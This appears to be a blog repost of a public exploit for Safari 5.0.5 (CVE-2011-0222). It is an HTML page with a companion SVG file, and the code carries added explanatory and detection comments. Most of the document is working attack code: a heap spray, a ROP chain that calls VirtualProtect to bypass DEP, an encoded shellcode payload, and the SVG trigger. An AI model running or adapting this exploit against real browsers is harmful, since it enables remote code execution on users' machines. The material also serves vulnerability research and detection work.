Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)

악성코드 유포에 이용될 수도 있을 것 같아 기록해 둡니다.
http://www.exploit-db.com/exploits/17575/

<html>
<head>
<script>
/* 
   Abysssec Public Advisory 

   Apple killed one of our 0days, so there is no point keeping it private anymore :( 
   There is another version of the exploit that uses a pop-up and is more reliable, but as you know Safari blocks pop-ups by default, so we found a cool way to bypass that and make it a stand-alone module. 
   This exploit uses ROP to bypass permanent DEP. 

   Note: change the spray range if it does not work on your machine. 

   CVE-2011-0222 : 

   WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) 
   via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.

   Tested on windows XP SP3 and safari 5.0.5 

   feel free to contact us at : info [at] abysssec.com 

   and follow @abysssec for updates 
*/
// Declared but never read or written anywhere in the visible script.
var cur_id;

// Property names that the recursive walk in crash() is allowed to follow.
// Any other enumerable property is skipped, so the traversal is confined to
// these five SVG DOM property names; which objects are actually reached
// depends on what window.open('target.svg') returns (not shown here).
var object_whiteList = {'document':1, 'rootElement':1, 'preserveAspectRatio':1,'baseVal':1, 'align':1 };

// Recursively walks `target`, reading only whitelisted properties and
// descending into those whose value is an object.  It is called on the
// window that loaded target.svg, alternating with re-sprays in event_loop();
// presumably this DOM traversal is the trigger for the memory corruption
// described in the header (CVE-2011-0222) — the page does not say more.
//
// target - object to walk (initially the window returned by window.open).
//
// Notes for readers:
// - `name` is declared with `var` twice; both refer to the same
//   function-scoped binding, so the second loop reuses the first loop's variable.
// - `eval('target.' + name)` reads the same value as `target[name]` for the
//   whitelisted names; the eval adds no capability, but string-built property
//   access like this is a common static-analysis indicator.
// - `typeof null === 'object'`, so a null-valued property recurses with
//   target === null; `for...in` over null iterates nothing, so that is harmless.
function crash(target) 
{
    var members = [];
    // Collect the enumerable property names before walking them.
    for (var name in target) members.push(name);

    // for...in over an array yields its indices as strings.
    for (var num in members) 
    {
        var name = members[num];

        // Skip everything that is not on the whitelist.
        if(object_whiteList[name] != 1)
            continue;

        var cur_value = null;
        cur_value = eval('target.' + name);

        if (typeof cur_value == 'object' )
            crash(cur_value);    

    }

};

// Allocates 10000 short-lived String objects in a row.  The name suggests it
// is meant to churn the heap / provoke a garbage-collection cycle before the
// spray; the page gives no further explanation, so treat that as the author's
// intent rather than a guaranteed effect.
//
// Side effect: `eval("gc_string = s")` assigns to an undeclared identifier,
// creating/overwriting a global `gc_string` on every iteration; only the last
// String object stays reachable through it after the loop ends.
function toggle_gc() {

  for (var i = 0; i < 10000; i++) {
    var s = new String("AAAA" + Math.random());
    eval("gc_string = s");
  }

}

// Heap-spray primitive: builds one string of `string_size` UTF-16 units that
// begins with `payload` and is padded with the decoded form of
// '%u4545%u4545', then allocates `n` further copies of it.
//
// size    - requested length; it is halved, presumably because `size` is a
//           byte count and each %uXXXX escape decodes to one 16-bit unit
//           (TODO confirm against the caller's intent).
// n       - number of extra copies to allocate (h1[1..n]).
// payload - string placed at the start of the sprayed block.
//
// Notes for readers:
// - `i` is assigned without `var`, so the loop counter becomes an implicit global.
// - `h1` is local and never returned, so the copies are unreachable once the
//   function exits; whether and when they are reclaimed is up to the engine's GC.
// - `unescape(h1[0])` runs on an already-decoded string; unless a decoded
//   character happens to be '%', each copy has the same content as h1[0].
// - From a detection standpoint, a loop that materialises thousands of
//   identical unescape()-built strings is the classic heap-spray signature.
function spray(size, n, payload)
{
    var string_size = size / 2;
    var str = payload;
    var c =  unescape('%u4545%u4545');
    while (str.length < string_size)
        str += c;

    var h1 = [];
    h1[0] = str.substring(0, string_size)
    for( i = 1; i <= n; i++)
        h1[i] = unescape(h1[0])

};

// Window object for the opened target.svg; assigned in run_tests(), walked by event_loop().
var t1;
// Alternates 0/1 in event_loop(): 0 = walk t1 via crash(), 1 = re-spray.
var state = 0;

// Timer-driven loop that alternates between walking the SVG window (state 0)
// and topping up the heap spray with a short two-unit payload (state 1), then
// re-arms itself every 10 ms.  It has no stop condition and runs until the
// page is closed or the process dies.
//
// `setTimeout('event_loop()', 10)` passes a string, which the browser
// evaluates like eval; passing the function reference would behave the same
// without the string evaluation.
function event_loop() 
{    
    if(state == 0)
        crash( t1);
    else
    {    var payload = unescape('%u0004%u7fc0');
        spray(32, 5000, payload);
    }
    state = (state + 1) % 2;    
    setTimeout('event_loop()', 10);
}

// Entry point, invoked from <body onload>.  The order is deliberate: heap
// churn (toggle_gc), then the large spray of the payload below, then opening
// target.svg in a window named 't1', then — after one second — the
// crash/re-spray loop in event_loop().
//
// The payload is a sequence of 16-bit units decoded with unescape(); the
// inline comments are the author's annotation of what each pair stands for.
// Every address in it is hard-coded for the platform named in the header
// (Windows XP SP3, Safari 5.0.5), so the chain is not portable and fails
// silently elsewhere.
//
// Detection note: the observable artifacts of this page are an onload
// handler that builds large unescape()-encoded strings, calls window.open on
// an SVG, and schedules string-argument setTimeout callbacks.
function run_tests() 
{
  toggle_gc();
  var payload = unescape('%u0004%u7fc0%u000c%u7fc0'
  + '%uB1C1%u7C9F'        // mov esp, [ecx] | some instruction | ret (stackPivot)
  + '%u0010%u7fc0%u4242%u4242'
  + '%uD53A%u7C96'        // pop ecx | ret
  + '%u1AD4%u7C80'        // virtualProtect
  + '%u29D2%u7C83'        // mov eax, ecx | ret
  + '%u99DE%u7642'        // call eax | pop ecx | ret
  + '%u003c%u7fc0'        // shellcode Address
  + '%u2000%u0000'        // size
  + '%u0040%u0000'        // permission
  + '%u0034%u7fc0'        
  + '%u6666%u6666'
  + '%u003c%u7fc0');

  // Second stage appended after the chain; its contents are opaque here.
  var shellcode =  unescape("%u9090%u8166%ufce4%u31ff%u56f6%u8b64%u3076%u768b%u8b0c%u1c76%u6e8b%u8b08%u8b36%u3c5d%u5c8b%u781d%ueb01%u4b8b%u6718%uece3%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucc75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ff");
  payload += shellcode;

  // Large initial spray; the window is opened only after it has been placed.
  spray(300,20000, payload);  
  t1 = window.open('target.svg', 't1');
  setTimeout('event_loop()', 1000); 
}

</script>

</head>

<body onload="run_tests()">
<svg></svg>
</body>
</html>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD svg 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<!-- Presumably the target.svg document that the page above opens with
     window.open('target.svg', 't1'): an empty SVG root whose DOM the
     crash() walk enumerates.  On its own this file contains nothing
     unusual. -->

<svg width="100%" height="100%" version="1.1" xmlns="http://www.w3.org/2000/svg">

</svg>
